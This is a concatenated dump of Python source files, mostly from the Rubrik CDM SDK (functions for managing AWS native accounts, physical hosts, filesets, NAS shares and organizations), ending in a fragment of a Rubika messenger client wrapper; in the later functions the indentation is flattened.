        aws_access_key {str} -- The access key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_ACCESS_KEY_ID` environment variable to pull the value from. (default: {None})
        aws_secret_key {str} -- The secret key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_SECRET_ACCESS_KEY` environment variable to pull the value from. (default: {None})
        aws_regions {list} -- List of AWS regions to protect in this AWS account. If set to the default `None` keyword argument, we will look for a `AWS_DEFAULT_REGION` environment variable to pull the value from. (default: {None}) (choices: {ap-south-1, ap-northeast-3, ap-northeast-2, ap-southeast-1, ap-southeast-2, ap-northeast-1, ca-central-1, cn-north-1, cn-northwest-1, eu-central-1, eu-west-1, eu-west-2, eu-west-3, us-west-1, us-east-1, us-east-2, us-west-2})
        regional_bolt_network_configs {list of dicts} -- List of dicts containing per region bolt network configs. (ex. dict format: {"region": "aws-region-name", "vNetId": "aws-vpc-id", "subnetId": "aws-subnet-id", "securityGroupId": "aws-subnet-id"}) (default: {None})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})

    Returns:
        str -- No change required. Cloud native source with access key `aws_access_key` is already configured on the Rubrik cluster.
        dict -- The full API response for `POST /internal/aws/account'`.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    valid_aws_regions = [
        'ap-south-1',
        'ap-northeast-3',
        'ap-northeast-2',
        'ap-southeast-1',
        'ap-southeast-2',
        'ap-northeast-1',
        'ca-central-1',
        'cn-north-1',
        'cn-northwest-1',
        'eu-central-1',
        'eu-west-1',
        'eu-west-2',
        'eu-west-3',
        'us-west-1',
        'us-east-1',
        'us-east-2',
        'us-west-2']

    # Cloud native protection requires CDM 4.2 or newer.
    if self.minimum_installed_cdm_version(4.2) is False:
        raise CDMVersionException(4.2)

    # Fall back to the standard AWS environment variables when the regions or
    # credentials are not provided explicitly.
    if aws_regions is None:
        aws_regions = [os.environ.get('AWS_DEFAULT_REGION')]
        if aws_regions == [None]:
            raise InvalidParameterException("`aws_region` has not been provided.")

    # Mirror the type validation done for `regional_bolt_network_configs`.
    if not isinstance(aws_regions, list):
        raise InvalidTypeException("`aws_regions` must be a list if defined.")

    if aws_access_key is None:
        aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
        if aws_access_key is None:
            raise InvalidParameterException("`aws_access_key` has not been provided.")

    if aws_secret_key is None:
        aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
        if aws_secret_key is None:
            raise InvalidParameterException("`aws_secret_key` has not been provided.")

    # Verify the supplied regions are in the supported list of regions for
    # cloud native protection.
    if any(aws_region not in valid_aws_regions for aws_region in aws_regions):
        raise InvalidParameterException(
            'The list `aws_regions` may only contain the following values: {}'.format(valid_aws_regions))

    # `regional_bolt_network_configs` must be either None or a list of dicts
    # that each contain the full set of required keys.
    if isinstance(regional_bolt_network_configs, list) is False and regional_bolt_network_configs is not None:
        raise InvalidTypeException("`regional_bolt_network_configs` must be a list if defined.")

    if regional_bolt_network_configs is not None:
        for bolt_network_config in regional_bolt_network_configs:
            if isinstance(bolt_network_config, dict) is False:
                raise InvalidTypeException("The `regional_bolt_network_configs` list can only contain dicts.")
            if any(requiredkey not in bolt_network_config for requiredkey in [
                    'region',
                    'vNetId',
                    'subnetId',
                    'securityGroupId']):
                raise InvalidParameterException(
                    "Each `regional_bolt_network_config` dict must contain the following keys: 'region', 'vNetId', 'subnetId', 'securityGroupId'.")

    # Log prefix now matches the actual function name for consistency with the
    # rest of the SDK (e.g. update_aws_native_account).
    self.log("add_aws_native_account: Searching the Rubrik cluster for cloud native sources.")
    cloud_native_on_cluster = self.get('internal', '/aws/account', timeout=timeout)

    for cloud_source in cloud_native_on_cluster['data']:
        # A cloud native source name must be unique on the cluster.
        self.log("add_aws_native_account: Validating no conflict with `{}`".format(cloud_source['id']))
        if cloud_source['name'] == aws_account_name:
            raise InvalidParameterException("Cloud native source with name '{}' already exists. Please enter a unique `aws_account_name`.".format(
                aws_account_name))

        # Idempotent return when a cloud native source with this access key
        # already exists.
        cloud_source_detail = self.get('internal', '/aws/account/{}'.format(cloud_source['id']), timeout=timeout)
        if cloud_source_detail['accessKey'] == aws_access_key:
            return "No change required. Cloud native source with access key '{}' is already configured on the Rubrik cluster.".format(
                aws_access_key)

    # Build the config for our API call.
    config = {}
    config['name'] = aws_account_name
    config['accessKey'] = aws_access_key
    config['secretKey'] = aws_secret_key
    config['regions'] = aws_regions
    # Only include bolt configs if they were supplied.
    if regional_bolt_network_configs is not None:
        config['regionalBoltNetworkConfigs'] = regional_bolt_network_configs

    self.log("add_aws_native_account: Creating the cloud native source.")
    return self.post('internal', '/aws/account', config, timeout)
def update_aws_native_account(self, aws_account_name, config, timeout=15):
    """Update an existing AWS account used for EC2 native protection on the Rubrik cluster.

    Arguments:
        aws_account_name {str} -- The name of the AWS account you wish to update. This is the name that is displayed in the Rubrik UI.
        config {dict} -- The configuration to use to update the AWS account. Full example values can be found in the Rubrik API Playground for the PATCH /aws/account/{id} endpoint.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        dict -- The full API response for `PATCH /aws/account/{id}`.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    # Cloud native protection requires CDM 4.2 or newer.
    if self.minimum_installed_cdm_version(4.2) is False:
        raise CDMVersionException(4.2)

    if not isinstance(config, dict):
        raise InvalidTypeException("The 'config' argument must be a dictionary.")

    self.log("update_aws_native_account: Checking the Rubrik cluster for the AWS Native Account.")
    account_id = self.object_id(aws_account_name, "aws_native", timeout=timeout)

    self.log("update_aws_native_account: Updating the AWS Native Account.")
    # Pass the user supplied timeout through to the API call (previously omitted).
    return self.patch("internal", "/aws/account/{}".format(account_id), config, timeout)
from .api import Api
from .exceptions import InvalidParameterException, InvalidTypeException
import inspect
class Physical(Api):
    """Methods for managing physical objects on the Rubrik cluster: physical
    hosts, NAS shares attached to hosts, and the Filesets used to protect them.
    """
def add_physical_host(self, hostname, timeout=60):
    """Add a physical host to the Rubrik cluster.

    Arguments:
        hostname {str} or [list] -- The hostname(s) or IP Address(es) of the physical host you want to add to the Rubrik cluster.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {60})

    Returns:
        str -- No change required. The host '`hostname`' is already connected to the Rubrik cluster.
        dict -- The full API response for `POST /v1/host`.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    if len(hostname) == 0:
        raise InvalidParameterException("The provided hostname list is empty.")

    self.log('Searching the Rubrik cluster for the current hosts.')
    current_hosts = self.get('v1', '/host', timeout=timeout)

    if isinstance(hostname, list):
        # Build the set of already-registered hostnames and filter into a new
        # list. The previous implementation called `hostname.remove()` while
        # iterating `hostname`, which skips elements (and mutates the caller's
        # list), so duplicate hosts could be re-added to the cluster.
        known_hostnames = {host['hostname'] for host in current_hosts['data']}

        new_hosts = []
        for single_host in hostname:
            if single_host in known_hostnames:
                self.log("The host '{}' is already connected to the Rubrik cluster. '{}' skipped.".format(
                    single_host, single_host))
            else:
                new_hosts.append(single_host)

        self.log("Adding '{}' Physical Host(s)".format(len(new_hosts)))
        if len(new_hosts) != 0:
            config = [{'hostname': host, 'hasAgent': True} for host in new_hosts]

            self.log("Adding the following physical host(s): '{}'".format(new_hosts))
            return self.post('internal', '/host/bulk', config, timeout)
        else:
            return "No change required. All Hosts have already been added or supplied list was empty."
    else:
        for host in current_hosts['data']:
            if host['hostname'] == hostname:
                return "No change required. The host '{}' is already connected to the Rubrik cluster.".format(
                    hostname)

        config = {}
        config['hostname'] = hostname
        config['hasAgent'] = True

        self.log("Adding the host '{}' to the Rubrik cluster.".format(hostname))
        return self.post('v1', '/host', config, timeout)
def delete_physical_host(self, hostname, timeout=120):
    """Delete a physical host from the Rubrik cluster.

    Arguments:
        hostname {str} -- The hostname or IP Address of the physical host you wish to remove from the Rubrik cluster.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {120})

    Returns:
        str -- No change required. The host '`hostname`' is not connected to the Rubrik cluster.
        dict -- The full API response for `DELETE /v1'/host/{host_id}`.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    self.log('Searching the Rubrik cluster for the current hosts.')
    current_hosts = self.get('v1', '/host', timeout=timeout)

    # Resolve the Rubrik ID of the first host entry whose hostname matches.
    matching_host_id = next(
        (entry['id'] for entry in current_hosts['data'] if entry['hostname'] == hostname),
        None)

    if matching_host_id is None:
        return "No change required. The host '{}' is not connected to the Rubrik cluster.".format(
            hostname)

    self.log("Deleting the host '{}' from the Rubrik cluster.".format(hostname))
    return self.delete('v1', '/host/{}'.format(matching_host_id), timeout=timeout)
def create_physical_fileset(self, name, operating_system, include, exclude, exclude_exception, follow_network_shares=False, backup_hidden_folders=False, timeout=15):  # pylint: ignore
    """Create a Fileset for a Linux or Windows machine.

    Arguments:
        name {str} -- The name of the Fileset you wish to create.
        operating_system {str} -- The operating system type of the Fileset you are creating. (choices: {Linux, Windows})
        include {list} -- The full paths or wildcards that define the objects to include in the Fileset backup (ex: ['/usr/local', '*.pdf']).
        exclude {list} -- The full paths or wildcards that define the objects to exclude from the Fileset backup (ex: ['/user/local/temp', '*.mov', '*.mp3']).
        exclude_exception {list} -- The full paths or wildcards that define the objects that are exempt from the `excludes` variables (ex: ['/company/*.mp4']).

    Keyword Arguments:
        follow_network_shares {bool} -- Include or exclude locally-mounted remote file systems from backups. (default: {False})
        backup_hidden_folders {bool} -- Include or exclude hidden folders inside locally-mounted remote file systems from backups. (default: {False})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        str -- No change required. The Rubrik cluster already has a `operating_system` Fileset named '`name`' configured with the provided variables.
        dict -- The full response for the `POST /internal/fileset_template/bulk` API endpoint.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    valid_operating_system = ['Linux', 'Windows']

    if operating_system not in valid_operating_system:
        raise InvalidParameterException("The create_physical_fileset() operating_system argument must be one of the following: {}.".format(
            valid_operating_system))

    if isinstance(follow_network_shares, bool) is False:
        raise InvalidTypeException("The 'follow_network_shares' argument must be True or False.")
    elif isinstance(backup_hidden_folders, bool) is False:
        raise InvalidTypeException("The 'backup_hidden_folders' argument must be True or False.")
    elif isinstance(include, list) is False:
        raise InvalidTypeException("The 'include' argument must be a list object.")
    elif isinstance(exclude, list) is False:
        raise InvalidTypeException("The 'exclude' argument must be a list object.")
    elif isinstance(exclude_exception, list) is False:
        raise InvalidTypeException("The 'exclude_exception' argument must be a list object.")

    # Path lists are sorted so the comparison below is order-independent.
    config = {}
    config['name'] = name
    config['includes'] = sorted(include)
    config['excludes'] = sorted(exclude)
    config['exceptions'] = sorted(exclude_exception)
    config['allowBackupHiddenFoldersInNetworkMounts'] = backup_hidden_folders
    config['allowBackupNetworkMounts'] = follow_network_shares
    config['operatingSystemType'] = operating_system

    self.log("create_fileset: Searching the Rubrik cluster for all current {} Filesets.".format(operating_system))
    current_filesets = self.get(
        'v1', '/fileset_template?primary_cluster_id=local&operating_system_type={}&name={}'.format(
            operating_system, name), timeout=timeout)

    # The `name` query parameter may match more than one template, so compare
    # against every returned Fileset instead of only the first entry
    # (previously only data[0] was checked, defeating the idempotence check).
    for fileset in current_filesets['data']:
        current_config = {
            'name': fileset['name'],
            'includes': sorted(fileset['includes']),
            'excludes': sorted(fileset['excludes']),
            'exceptions': sorted(fileset['exceptions']),
            'allowBackupHiddenFoldersInNetworkMounts': fileset['allowBackupHiddenFoldersInNetworkMounts'],
            'operatingSystemType': fileset['operatingSystemType'],
            'allowBackupNetworkMounts': fileset['allowBackupNetworkMounts'],
        }
        if current_config == config:
            return "No change required. The Rubrik cluster already has a {} Fileset named '{}' configured with the provided variables.".format(
                operating_system, name)

    # The bulk endpoint expects a list of Fileset definitions.
    self.log("create_fileset: Creating the '{}' Fileset.".format(name))
    return self.post('internal', '/fileset_template/bulk', [config], timeout=timeout)
def create_nas_fileset(self, name, share_type, include, exclude, exclude_exception, follow_network_shares=False, timeout=15):  # pylint: ignore
    """Create a NAS Fileset.

    Arguments:
        name {str} -- The name of the Fileset you wish to create.
        share_type {str} -- The type of NAS Share you wish to backup. (choices: {NFS, SMB})
        include {list} -- The full paths or wildcards that define the objects to include in the Fileset backup.
        exclude {list} -- The full paths or wildcards that define the objects to exclude from the Fileset backup.
        exclude_exception {list} -- The full paths or wildcards that define the objects that are exempt from the `excludes` variables.

    Keyword Arguments:
        follow_network_shares {bool} -- Include or exclude locally-mounted remote file systems from backups. (default: {False})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        str -- No change required. The Rubrik cluster already has a NAS Fileset named '`name`' configured with the provided variables.
        dict -- The full response for the `POST /internal/fileset_template/bulk` API endpoint.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    valid_share_type = ['NFS', 'SMB']

    if share_type not in valid_share_type:
        raise InvalidParameterException(
            "The create_fileset() share_type argument must be one of the following: {}.".format(valid_share_type))

    if isinstance(follow_network_shares, bool) is False:
        raise InvalidTypeException("The 'follow_network_shares' argument must be True or False.")
    elif isinstance(include, list) is False:
        raise InvalidTypeException("The 'include' argument must be a list object.")
    elif isinstance(exclude, list) is False:
        raise InvalidTypeException("The 'exclude' argument must be a list object.")
    elif isinstance(exclude_exception, list) is False:
        raise InvalidTypeException("The 'exclude_exception' argument must be a list object.")

    # Path lists are sorted so the comparison below is order-independent.
    config = {}
    config['name'] = name
    config['includes'] = sorted(include)
    config['excludes'] = sorted(exclude)
    config['exceptions'] = sorted(exclude_exception)
    config['allowBackupHiddenFoldersInNetworkMounts'] = follow_network_shares
    config['shareType'] = share_type

    self.log("create_fileset: Searching the Rubrik cluster for all current NAS Filesets.")
    current_filesets = self.get(
        'v1', '/fileset_template?primary_cluster_id=local&operating_system_type=NONE&name={}'.format(name), timeout=timeout)

    # The `name` query parameter may match more than one template, so compare
    # against every returned Fileset instead of only the first entry
    # (previously only data[0] was checked, defeating the idempotence check).
    for fileset in current_filesets['data']:
        current_config = {
            'name': fileset['name'],
            'includes': sorted(fileset['includes']),
            'excludes': sorted(fileset['excludes']),
            'exceptions': sorted(fileset['exceptions']),
            'allowBackupHiddenFoldersInNetworkMounts': fileset['allowBackupHiddenFoldersInNetworkMounts'],
            'shareType': fileset['shareType'],
        }
        if current_config == config:
            return "No change required. The Rubrik cluster already has a NAS Fileset named '{}' configured with the provided variables.".format(
                name)

    # The bulk endpoint expects a list of Fileset definitions.
    self.log("create_fileset: Creating the '{}' Fileset.".format(name))
    return self.post('internal', '/fileset_template/bulk', [config], timeout=timeout)
def add_nas_share_to_host(self, hostname, share_type, export_point, username=None, password=None, domain=None, timeout=60):  # pylint: ignore
    """Add a network share to a host.

    Arguments:
        hostname {str} -- The hostname or IP Address of the host serving the NAS share.
        share_type {str} -- The type of NAS Share you wish to backup. (choices: {NFS, SMB})
        export_point {str} -- Name of the share exported by the NAS host.

    Keyword Arguments:
        username {str} -- Username if the network share requires authentication.
        password {str} -- Password if the network share requires authentication.
        domain {str} -- Domain name of account credentials used for authentication.
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default {60})

    Returns:
        str -- No change required. The share with the given hostname and export point has already been added.
        dict -- The full API response for `POST /internal/host/share` with the given share arguments.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    valid_share_type = ['NFS', 'SMB']
    share_address = "{}:{}".format(hostname, export_point)

    if share_type not in valid_share_type:
        raise InvalidParameterException(
            "The add_nas_share_to_host() share_type argument must be one of the following: {}.".format(valid_share_type))

    host_id = self.object_id(hostname, 'physical_host')

    self.log("add_nas_share_to_host: Getting the properties of the {} share {}.".format(share_type, share_address))
    current_host_shares = self.get(
        'internal', '/host/share?share_type={}&hostid={}'.format(share_type, host_id),
        timeout=timeout)

    # Idempotence check: bail out when this export point is already registered
    # for the host.
    share_already_registered = any(
        share_properties['exportPoint'] == export_point
        for share_properties in current_host_shares['data'])

    if share_already_registered:
        return "No change required. The {} share {} is already in Rubrik.".format(share_type, share_address)

    config = {
        'hostId': host_id,
        'shareType': share_type,
        'exportPoint': export_point,
    }
    # Credentials are optional and only sent when supplied.
    for credential_key, credential_value in (
            ('username', username), ('password', password), ('domain', domain)):
        if credential_value:
            config[credential_key] = credential_value

    self.log("Adding the {} share {} to Rubrik.".format(share_type, share_address))
    return self.post('internal', '/host/share', config, timeout)
def assign_physical_host_fileset(self, hostname, fileset_name, operating_system, sla_name, include=None, exclude=None, exclude_exception=None, follow_network_shares=False, backup_hidden_folders=False, timeout=30): # pylint: ignore
"""Assign a Fileset to a Linux, Unix or Windows machine. If you have multiple Filesets with identical names, you will need to populate the Filesets properties (i.e this functions keyword arguments)
to find a specific match. Filesets with identical names and properties are not supported.
Arguments:
hostname {str} -- The hostname or IP Address of the physical host you wish to associate to the Fileset.
fileset_name {str} -- The name of the Fileset you wish to assign to the Linux, Unix or Windows host.
operating_system {str} -- The operating system of the physical host you are assigning a Fileset to. (choices: {Linux, Windows, UnixLike})
sla_name {str} -- The name of the SLA Domain to associate with the Fileset.
Keyword Arguments:
include {list} -- The full paths or wildcards that define the objects to include in the Fileset backup (ex: ['/usr/local', '*.pdf']). (default: {None})
exclude {list} -- The full paths or wildcards that define the objects to exclude from the Fileset backup (ex: ['/user/local/temp', '*.mov', '*.mp3']). (default: {None})
exclude_exception {list} -- The full paths or wildcards that define the objects that are exempt from the `excludes` variables. (ex: ['/company/*.mp4']). (default: {None})
follow_network_shares {bool} -- Include or exclude locally-mounted remote file systems from backups. (default: {False})
backup_hidden_folders {bool} -- Include or exclude hidden folders inside locally-mounted remote file systems from backups. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The `operating_system` Fileset '`fileset_name`' is already assigned to the SLA Domain '`sla_name`' on the physical host '`hostname`'.
tuple -- When a new Fileset is created the following tuple will be returned: (Full API response from `POST /v1/fileset`, Full API response from `POST /v1/fileset/{id}`)
dict -- When the Fileset already exsits but is assigned to the wrong the SLA the Full API response from `POST `v1/fileset/{id}` is returned.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_operating_system = ['Linux', 'Windows', 'UnixLike']
if operating_system not in valid_operating_system:
raise InvalidParameterException("The assign_physical_host_fileset() operating_system argument must be one of the following: {}.".format(
valid_operating_system))
if include is None:
include = []
if exclude is None:
exclude = []
if exclude_exception is None:
exclude_exception = []
if isinstance(follow_network_shares, bool) is False:
raise InvalidTypeException("The 'follow_network_shares' argument must be True or False.")
elif isinstance(backup_hidden_folders, bool) is False:
raise InvalidTypeException("The 'backup_hidden_folders' argument must be True or False.")
elif isinstance(include, list) is False:
raise InvalidTypeException("The 'include' argument must be a list object.")
elif isinstance(exclude, list) is False:
raise InvalidTypeException("The 'exclude' argument must be a list object.")
elif isinstance(exclude_exception, list) is False:
raise InvalidTypeException("The 'exclude_exception' argument must be a list object.")
self.log(
"assign_physical_host_fileset: Searching the Rubrik cluster for the {} physical host {}.".format(
operating_system,
hostname))
current_hosts = self.get('v1',
'/host?operating_system_type={}&primary_cluster_id=local&hostname={}'.format(operating_system,
hostname),
timeout=timeout)
if current_hosts['total'] >= 1:
for host in current_hosts['data']:
if host['hostname'] == hostname:
host_id = host['id']
break
try:
host_id
except NameError:
raise InvalidParameterException(
"The Rubrik cluster is not connected to a {} physical host named '{}'.".format(operating_system, hostname))
self.log("assign_physical_host_fileset: Searching the Rubrik cluster for all current {} Filesets.".format(operating_system))
current_filesets_templates = self.get(
'v1', '/fileset_template?primary_cluster_id=local&operating_system_type={}&name={}'.format(
operating_system, fileset_name), timeout=timeout)
number_of_matches = 0
if current_filesets_templates['total'] == 0:
raise InvalidParameterException(
"The Rubrik cluster does not have a {} Fileset named '{}'.".format(
operating_system, fileset_name))
elif current_filesets_templates['total'] > 1:
for fileset_template in current_filesets_templates['data']:
if fileset_template['name'] == fileset_name:
number_of_matches += 1
if number_of_matches > 1:
# If there are multiple Filesets with the same name us all of
# the possible config values to try and find the correct
# Fileset
for fileset_template in current_filesets_templates['data']:
if fileset_template['name'] == fileset_name \
and fileset_template['includes'] == include \
and fileset_template['excludes'] == exclude \
and fileset_template['exceptions'] == exclude_exception \
and fileset_template['allowBackupHiddenFoldersInNetworkMounts'] == follow_network_shares \
and fileset_template['allowBackupNetworkMounts'] == backup_hidden_folders:
fileset_template_id = fileset_template['id']
number_of_matches = 1
try:
fileset_template_id
except NameError:
if number_of_matches > 0:
# If no unique matches are found provide an error
# message
if include != [] \
or exclude != [] \
or exclude_exception != [] \
or follow_network_shares\
or backup_hidden_folders:
# Error message that first checks to see if any of
# the extra variables are populated with anything
# besides the default (aka the user tried to be as
# unique as possible)
raise InvalidParameterException(
"The Rubrik cluster contains multiple {} Filesets named '{}' that match all of the populate function arguments. Please use a unique Fileset.".format(
operating_system, fileset_name))
else:
raise InvalidParameterException(
"The Rubrik cluster contains multiple {} Filesets named '{}'. Please populate all function arguments to find a more specific match.".format(
operating_system, fileset_name))
if current_filesets_templates['total'] == 1 or number_of_matches == 1:
for fileset_temmplate in current_filesets_templates['data']:
if fileset_temmplate['name'] == fileset_name:
fileset_template_id = fileset_temmplate['id']
self.log("assign_physical_host_fileset: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
self.log("assign_physical_host_fileset: Getting the properties of the {} Fileset.".format(fileset_name))
current_fileset = self.get(
'v1', '/fileset?primary_cluster_id=local&host_id={}&is_relic=false&template_id={}'.format(host_id, fileset_template_id), timeout=timeout)
if current_fileset['total'] == 0:
self.log(
"assign_physical_host_fileset: Assigning the '{}' Fileset to the {} physical host '{}'.".format(
fileset_name,
operating_system,
hostname))
config = {}
config['hostId'] = host_id
config['templateId'] = fileset_template_id
create_fileset = self.post('v1', '/fileset', config, timeout)
fileset_id = create_fileset['id']
config = {}
config['configuredSlaDomainId'] = sla_id
assign_sla = self.patch('v1', '/fileset/{}'.format(fileset_id), config, timeout)
return (create_fileset, assign_sla)
elif current_fileset['total'] == 1 and current_fileset['data'][0]['configuredSlaDomainId'] != sla_id:
self.log(
"assign_physical_host_fileset: Assigning the '{}' SLA Domain to the '{}' Fileset attached to the {} physical host '{}'.".format(
sla_name,
fileset_name,
operating_system,
hostname))
fileset_id = current_fileset['data'][0]['id']
config = {}
config['configuredSlaDomainId'] = sla_id
return self.patch('v1', '/fileset/{}'.format(fileset_id), config, timeout)
elif current_fileset['total'] == 1 and current_fileset['data'][0]['configuredSlaDomainId'] == sla_id:
return "No change required. The {} Fileset '{}' is already assigned to the SLA Domain '{}' on the physical host '{}'.".format(
operating_system, fileset_name, sla_name, hostname)
def add_host_share(self, hostname, share_type, export_point, username=None, password=None, domain=None, timeout=60):
"""Add a network share object to a host.
Arguments:
hostname {str} -- The hostname or IP Address of the physical host you want to add to the Rubrik cluster.
share_type {str} -- The share object type to be added to the host. (choices: {NFS, SMB})
export_point {str} -- The NFS export path of the share.
Keyword Arguments:
username {str} -- The username for the host. (default: {None})
password {str} -- The password for the host. (default: {None})
domain {str} -- The domain for the host (default: {None})
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {60})
Returns:
dict -- The full API response for `POST /internal/host/share`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if(len(hostname) == 0 or len(share_type) == 0 or len(export_point) == 0):
raise InvalidParameterException("The provided hostname list, share_type, export_point is empty.")
self.log('Searching the Rubrik cluster for the host ID.')
host_id = self.object_id(hostname, 'physical_host', timeout=timeout)
config = {}
config['hostname'] = hostname
config['hostId'] = host_id
config['shareType'] = share_type
config['exportPoint'] = export_point
config['username'] = username
config['password'] = password
config['domain'] = domain
self.log("add_host_share: Adding share object '{}' to Physical Host ID {}".format(export_point, host_id))
return self.post('internal', '/host/share', config, timeout) | /rubrik_cdm-2.0.10.tar.gz/rubrik_cdm-2.0.10/rubrik_cdm/physical.py | 0.832271 | 0.22439 | physical.py | pypi |
from .api import Api
import inspect
class Organization(Api):
"""This class contains methods related to backup and restore operations for the various objects managed by the Rubrik cluster."""
def add_organization_protectable_object_mssql_server_host(self, organization_name, mssql_host, timeout=15):
"""Add a MSSQL Server Host to an organization as a protectable object.
Arguments:
organization_name {str} -- The name of the organization you wish to add the protectable object to.
mssql_host {str} -- The name of the MSSQL Host to add to the organization as a protectable object.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The MSSQL host {mssql_host} is already assigned to the {organization_name} organization.
dict -- The full API response for `POST /internal/role/{id}/authorization`
"""
self.function_name = inspect.currentframe().f_code.co_name
organization_id = self.object_id(
organization_name, "organization", timeout=timeout)
org_admin_id = self.object_id(
organization_name, "organization_admin_role", timeout=timeout)
self.log("add_organization_protectable_object_sql_server: Gathering the current MSSQL objects protected by the {} organization.".format(
organization_name))
current_mssql_protected_objects = self.get(
"internal", "/organization/{}/mssql".format(organization_id), timeout=timeout)
objects_to_protect = []
sql_host_id = self.object_id(
mssql_host, "physical_host", timeout=timeout)
for protected_object in current_mssql_protected_objects["data"]:
if protected_object["managedId"] == sql_host_id:
return "No change required. The MSSQL host {} is already assigned to the {} organization.".format(mssql_host, organization_name)
objects_to_protect.append(sql_host_id)
config = {
"authorizationSpecifications": [
{
"privilege": "ManageRestoreSource",
"resources": objects_to_protect
}
],
"roleTemplate": "Organization"
}
return self.post("internal", "/role/{}/authorization".format(org_admin_id), config, timeout=timeout)
def add_organization_protectable_object_sql_server_db(self, organization_name, mssql_db, mssql_host, mssql_instance, timeout=15):
"""Add a MSSQL Database to an organization as a protectable object.
Arguments:
organization_name {str} -- The name of the organization you wish to add the protectable object to.
mssql_db {str} -- The name of the MSSQL DB to add to the organization as a protectable object.
mssql_instance {str} -- The name of the MSSQL instance where the MSSQL DB lives.
mssql_host {str} -- The name of the MSSQL host where the MSSQL DB lives.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The MSSQL DB {mssql_db} is already assigned to the {organization_name} organization.
dict -- The full API response for `POST /internal/role/{id}/authorization`
"""
self.function_name = inspect.currentframe().f_code.co_name
organization_id = self.object_id(
organization_name, "organization", timeout=timeout)
org_admin_id = self.object_id(
organization_name, "organization_admin_role", timeout=timeout)
self.log("add_organization_protectable_object_sql_server: Gathering the current MSSQL objects protected by the {} organization.".format(
organization_name))
current_mssql_protected_objects = self.get(
"internal", "/organization/{}/mssql".format(organization_id), timeout=timeout)
objects_to_protect = []
db_id = self.object_id(
mssql_db, "mssql_db", mssql_instance=mssql_instance, mssql_host=mssql_host, timeout=timeout)
for protected_object in current_mssql_protected_objects["data"]:
if protected_object["managedId"] == db_id:
return "No change required. The MSSQL DB {} is already assigned to the {} organization.".format(mssql_db, organization_name)
objects_to_protect.append(db_id)
config = {
"authorizationSpecifications": [
{
"privilege": "ManageRestoreSource",
"resources": objects_to_protect
}
],
"roleTemplate": "Organization"
}
return self.post("internal", "/role/{}/authorization".format(org_admin_id), config, timeout=timeout)
def add_organization_protectable_object_sql_server_availability_group(self, organization_name, mssql_availability_group, timeout=15):
"""Add a MSSQL Availability Group to an organization as a protectable object.
Arguments:
organization_name {str} -- The name of the organization you wish to add the protectable object to.
mssql_availability_group {str} -- The name of the MSSQL Availability Group to add to the organization as a protectable object.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The MSSQL Availability Group {mssql_availability_group} is already assigned to the {organization_name} organization.
dict -- The full API response for `POST /internal/role/{id}/authorization`
"""
self.function_name = inspect.currentframe().f_code.co_name
organization_id = self.object_id(
organization_name, "organization", timeout=timeout)
org_admin_id = self.object_id(
organization_name, "organization_admin_role", timeout=timeout)
self.log("add_organization_protectable_object_sql_server: Gathering the current MSSQL objects protected by the {} organization.".format(
organization_name))
current_mssql_protected_objects = self.get(
"internal", "/organization/{}/mssql".format(organization_id), timeout=timeout)
objects_to_protect = []
ag_id = self.object_id(
mssql_availability_group, "mssql_availability_group", timeout=timeout)
for protected_object in current_mssql_protected_objects["data"]:
if protected_object["managedId"] == ag_id:
return "No change required. The MSSQL Availability Group {} is already assigned to the {} organization.".format(mssql_availability_group, organization_name)
objects_to_protect.append(ag_id)
config = {
"authorizationSpecifications": [
{
"privilege": "ManageRestoreSource",
"resources": objects_to_protect
}
],
"roleTemplate": "Organization"
}
return self.post("internal", "/role/{}/authorization".format(org_admin_id), config, timeout=timeout) | /rubrik_cdm-2.0.10.tar.gz/rubrik_cdm-2.0.10/rubrik_cdm/organization.py | 0.855776 | 0.284424 | organization.py | pypi |
from .connection import GetData
from .sessions import RubikaClient as Client
class Method(object):
@classmethod
def from_json(cls, session: str, method_name: str,
*args, **kwargs) -> (dict):
'''
# this is a method to use custom method on rubika client
Method('session', 'SendMessage', chat_id='u0...', text='Hey!')
'''
# use as personalization and customization
'''
kwargs methods:
data: dict = {}
assert list(map(lambda key: data.update({key: kwargs.get(key)}, list(kwargs.keys()))))
'''
return (
GetData.api(
version = '5',
method = method_name[0].lower() + method_name[1:],
auth = session,
data = kwargs,
proxy = {'http': 'http://127.0.0.1:9050'},
platform = 'rubx',
mode = 'mashhad'
)
)
class Messenger(Method):
def __init__(self, session: str = None, *args, **kwargs) -> None:
'''
with Messenger() as client:
client.session = 'key'
result = client.method('getMessagesUpdates', object_guid=..., state=...)
print(result)
'''
self.session = session
def __enter__(self, *args, **kwargs):
